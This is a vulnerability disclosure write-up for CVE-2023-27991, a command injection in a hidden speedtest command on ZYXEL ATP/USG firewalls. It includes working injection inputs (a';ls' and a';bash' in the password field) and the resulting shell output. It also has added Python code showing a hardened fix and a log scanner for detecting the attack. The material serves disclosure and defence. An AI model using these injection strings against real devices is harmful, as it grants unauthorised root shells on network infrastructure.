
    CVE-2023-27991: Remote Code Execution in ZYXEL ATP/USG (V5.35)

    March 5, 2025

    "If you want to keep a secret, you must also hide it from yourself."
    – George Orwell, 1984


    Summary

    During my red teaming engagement on ZYXEL's products, I discovered several hidden commands within their ZYSH binary. One notable command is the speedtest utility, which enables testing of connectivity speed directly from the firewall.

    1. Speedtest Utility

    To run the speedtest utility, log in via SSH or the web console as either admin or
    limited-admin, and execute the following command:

    Router> debug _speedtest host a user a password a interface a speedtest-host a

    This will generate the following output.

    Router> debug _speedtest host a user a password a interface a speedtest-host a
    + host=a
    + id=a
    + pw=a
    + basedir=/tmp/
    + pwd
    /db/etc/zyxel/ftp
    + remodir=/zyxel/x86/
    + filename=speedtest.tar.bz2
    + cd /tmp/
    + ftp -n a
    ftp: a: Name or service not known
    Not connected.
    Not connected.
    Not connected.
    Not connected.
    + tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
    tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error is not recoverable: exiting now
    + rm -f /tmp/speedtest.tar.bz2
    + cd /tmp/speedtest
    + pwd
    /tmp/speedtest
    + LD_LIBRARY_PATH=/tmp/speedtest
    + ./php speedtest.php
    /tmp/speedtest.sh: line 22: ./php: No such file or directory
    Router> 

    2. Parameter Injection

    While experimenting with the utility, I noticed that the values passed as parameters to the command are not sanitized, so additional shell commands can be injected through them.

    Injection Example & Directory Listing

    It appears that the username and password parameters are not sanitized properly. This allows for the injection of bash commands into the ZYSH command. An example of this injection is:

    Router> debug _speedtest host a user a password a';ls' interface eth1 speedtest-host a

    Output:

    Router> debug _speedtest host a user a password a';ls' interface a speedtest-host a 
    + host=a
    + id=a
    + pw=a
    + ls
    3G_patch_file.wwan_decryption  conf             dev              firmware2       latest_version.test  script        tr069
    av                             current_version  diaginfo_script  idp             licenseremind        standby_conf  twofa
    cert                           debug            firmware1        latest_version  packet_trace         tmp           wtp_image
    + basedir=/tmp/
    + pwd
    /db/etc/zyxel/ftp
    + remodir=/zyxel/x86/
    + filename=speedtest.tar.bz2
    + cd /tmp/
    + ftp -n a
    ftp: a: Name or service not known
    Not connected.
    Not connected.
    Not connected.
    Not connected.
    + tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
    tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
    tar (child): Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: Error is not recoverable: exiting now
    + rm -f /tmp/speedtest.tar.bz2
    + cd /tmp/speedtest
    + pwd
    /tmp/speedtest
    + LD_LIBRARY_PATH=/tmp/speedtest
    + ./php speedtest.php
    /tmp/speedtest.sh: line 22: ./php: No such file or directory
    Router> 

    Someone in Taiwan must have thought: "Come on, who will ever find this utility? … laugh"
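    To make the root cause and the fix concrete, here is an added Python model; it is not Zyxel's code, and the real ZYSH and speedtest.sh sources are not on the page. It assumes the CLI front-end writes the debug _speedtest arguments into a shell script template using single-quoted assignments (an assumption chosen to reproduce the trace above, where the assignments run first and the injected ls runs next), tokenizes each generated line the way a POSIX shell would, and contrasts that with the hardened form: an allowlist for identifiers plus shlex.quote for the password. The template, the allowlist policy and all function names are assumptions.

```python
import re
import shlex

# Assumed model of the vulnerable pattern: the CLI front-end writes the raw
# "debug _speedtest" arguments into a shell script template. This template is
# an assumption for the example, not the actual ZYSH/speedtest.sh source.
UNSAFE_TEMPLATE = "host='{host}'\nid='{user}'\npw='{pw}'\niface='{iface}'\nst='{st_host}'\n"
SAFE_TEMPLATE = "host={host}\nid={user}\npw={pw}\niface={iface}\nst={st_host}\n"

# Allowlist for identifiers that never legitimately contain shell syntax
# (hostnames, usernames, interface names). Policy chosen for this example.
_IDENT = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def validate(name, value):
    """Reject any identifier outside the allowlist instead of trying to escape it."""
    if not _IDENT.match(value):
        raise ValueError(f"{name}: rejected value {value!r}")
    return value


def rejects(name, value):
    """True when validate() refuses the value (used by the checks below)."""
    try:
        validate(name, value)
    except ValueError:
        return True
    return False


def build_unsafe(host, user, pw, iface, st_host):
    """Vulnerable: raw values interpolated into quoted shell assignments.
    A value like a';ls' closes the quote and appends a second command."""
    return UNSAFE_TEMPLATE.format(host=host, user=user, pw=pw, iface=iface, st_host=st_host)


def build_safe(host, user, pw, iface, st_host):
    """Hardened: identifiers must pass the allowlist; the password may contain
    punctuation, so it is shell-quoted rather than rejected."""
    return SAFE_TEMPLATE.format(
        host=shlex.quote(validate("host", host)),
        user=shlex.quote(validate("user", user)),
        pw=shlex.quote(pw),
        iface=shlex.quote(validate("interface", iface)),
        st_host=shlex.quote(validate("speedtest-host", st_host)),
    )


def shell_commands(line):
    """Tokenize one line like a POSIX shell and split it into simple commands
    at ; | & || && so an injected command shows up as an extra entry."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "|", "||", "&", "&&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def count_commands(script):
    """Number of simple commands across the generated script."""
    return sum(len(shell_commands(line)) for line in script.splitlines())


if __name__ == "__main__":
    injected = "a';ls'"  # the password value from the trace above
    print(count_commands(build_unsafe("a", "a", injected, "a", "a")))  # 6: the extra one is ls
    print(count_commands(build_safe("a", "a", injected, "a", "a")))    # 5: ls stays inside pw
    print(rejects("user", injected))                                    # True
```

    The design point is that there are two different kinds of parameter here: hostnames, usernames and interface names have a tight legitimate character set and should simply be refused when they fall outside it, while a password legitimately contains punctuation and therefore has to be quoted so that the shell treats it as one word. Passing the values as separate argv elements to the helper script, with no shell string in between, removes the problem class entirely.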

    3. Shell Access

    Next, I attempted to spawn a shell by injecting ;bash in the same way.

    Output:

    Router> debug _speedtest host a user a password a';bash' interface a speedtest-host a
    + host=a
    + id=a
    + pw=a
    + bash
    bash-4.2$ id
    uid=10006(zyxeladmin) gid=10000(operator) groups=10000(operator)
    bash-4.2$ 

    4. User Access Control

    To assess whether a less-privileged user could perform the same actions, I created a new user with limited access; the injection worked for that user as well.

    5. Privilege Escalation

    Attempts to escalate privileges were unnecessary, as executing the command injection via the web console's CLI spawns a bash shell with root access.

    Conclusion

    This demonstrates a serious vulnerability in the ZYXEL devices, allowing users with admin or limited-admin privileges to escalate their access to root via the web console.
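    As an added detection example (not from the original post): a scanner over constructed CLI audit records that flags any use of the hidden debug _speedtest command and raises the severity when one of its parameters carries shell metacharacters, which is the injection pattern shown in the traces above. The log layout, field names and sample records are assumptions constructed for this example; map the regex onto the firewall's real syslog export before using it.

```python
import re
from dataclasses import dataclass

# Constructed audit records in a generic "user ran CLI command" layout.
# The field layout is an assumption for this example, not a Zyxel log format.
SAMPLE_LOG = """\
2025-03-05T10:01:12Z fw1 cli: user=admin src=10.0.0.5 via=ssh cmd="show version"
2025-03-05T10:02:40Z fw1 cli: user=admin src=10.0.0.5 via=ssh cmd="debug _speedtest host a user a password a interface a speedtest-host a"
2025-03-05T10:03:01Z fw1 cli: user=demo src=10.0.0.9 via=web cmd="debug _speedtest host a user a password a';bash' interface a speedtest-host a"
2025-03-05T10:03:30Z fw1 cli: user=admin src=10.0.0.5 via=ssh cmd="debug _speedtest host a user a password a';ls' interface eth1 speedtest-host a"
2025-03-05T10:04:00Z fw1 cli: user=admin src=10.0.0.5 via=ssh cmd="ping 10.0.0.1"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<dev>\S+) cli: user=(?P<user>\S+) src=(?P<src>\S+) '
    r'via=(?P<via>\S+) cmd="(?P<cmd>.*)"$'
)
HIDDEN_CMD = "debug _speedtest"
# Characters that have no business in a hostname/username/interface argument.
METACHARS = re.compile(r"[;|&`$'\"\\]")


@dataclass
class Alert:
    ts: str
    user: str
    src: str
    via: str
    severity: str
    reason: str


def classify(cmd):
    """Return (severity, reason) for one CLI command, or None if benign."""
    if not cmd.startswith(HIDDEN_CMD):
        return None
    args = cmd[len(HIDDEN_CMD):]
    if METACHARS.search(args):
        return "high", "shell metacharacters in debug _speedtest parameters (CVE-2023-27991 injection pattern)"
    return "medium", "use of hidden debug _speedtest command"


def scan(log_text):
    """Parse each record and emit an Alert for every suspicious command."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable record: skip it rather than abort the scan
        verdict = classify(m["cmd"])
        if verdict is None:
            continue
        severity, reason = verdict
        if severity == "high" and m["via"] == "web":
            reason += "; web console path yields a root shell per the advisory"
        alerts.append(Alert(m["ts"], m["user"], m["src"], m["via"], severity, reason))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.ts} {a.severity.upper():6} user={a.user} src={a.src} via={a.via} {a.reason}")
```

    Any invocation of the hidden command is worth a look on its own, since it is not part of the documented CLI; the metacharacter check then separates a curious administrator from an injection attempt, and the via field tells you whether the web console path, which the post reports yields a root shell, was used.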


    Disclosure

    • 2023-03-14: ZYXEL was notified via <security@zyxel.com.tw>
    • 2023-03-14: ZYXEL acknowledged my vulnerability report.
    • 2023-03-23: ZYXEL assigned CVE-2023-27991 to the reported issues and informed me of their intention to publish their security advisory on 2023-05-09.
    • 2023-04-14: ZYXEL informed me that they managed to fix the vulnerability ahead of schedule and would release the fix and disclose the vulnerability on 2023-04-25.
    • 2023-04-25: ZYXEL published their security advisory, following my coordinated disclosure timeline.